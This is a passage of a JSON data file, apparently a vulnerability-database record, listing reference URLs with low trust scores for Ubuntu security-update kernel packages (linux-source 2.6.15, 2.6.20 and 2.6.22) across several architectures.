        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-xeon_2.6.15-52.67_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-modules-2.6.22-15-generic-di_2.6.22.4-15.11_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-lpia-di_2.6.22-15.16_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy-dev_1.0.7174+2.6.15.12-52.3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/avm-fritz-kernel-source_3.11+2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-sparc64_2.6.15-52.67_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-powerpc-smp_2.6.22-15.54_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-legacy-kernel-source_1.0.7185+2.6.22.4-15.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-lowlatency_2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-legacy-kernel-source_1.0.7184+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-lpia_2.6.22-15.54_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-doc-2.6.22_2.6.22-15.54_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-server_2.6.15-52.67_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-15-virtual_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-kernel-source_1.0.8776+2.6.15.12-52.3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22_2.6.22-15.39.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-dev_1.0.8776+2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-powerpc64-smp_2.6.20.6-17.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-glx-legacy_1.0.7185+2.6.22.4-15.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-sparc64_2.6.15-52.10_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-rt_2.6.22-15.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-powerpc-smp_2.6.22-15.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-xen_2.6.22-15.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy_1.0.7184+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-15-server_2.6.22-15.54_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/fglrx-control_8.25.18+2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-common_2.6.22.4-15.11_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-386-di_2.6.22-15.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-new_100.14.19+2.6.22.4-15.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-lpiacompat_2.6.22-15.54_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx_7.1.0-8.34.8+2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-kernel-devel_2.6.22-15.54_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/fglrx-kernel-source_8.34.8+2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-15.54_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-server_2.6.20-17.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-sparc64-di_2.6.22-15.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-dev_1.0.9631+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-powerpc-smp_2.6.22.4-15.11_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-686_2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-powerpc_2.6.15.12-52.3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx_1.0.8776+2.6.15.12-52.3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-server_2.6.20-17.12_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22_2.6.22-15.39.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-server_2.6.22-15.54_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-powerpc64-smp_2.6.20-17.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-server-kernel-modules-2.6.20-17_2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-server_2.6.15-52.67_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-sparc64-smp_2.6.20-17.36_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-powerpc-di_2.6.22-15.16_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-52-powerpc-di_2.6.15.12-52.3_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-lpia_2.6.22.4-15.11_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-386_2.6.15-52.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-17-lowlatency_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-686_2.6.15-52.67_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-lpia_2.6.22-15.16_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy-dev_1.0.7184+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-powerpc-smp_2.6.20-17.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-new-dev_100.14.19+2.6.22.4-15.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-powerpc_2.6.22-15.54_powerpc.deb"
      },
      {
        "trust": 0.1,
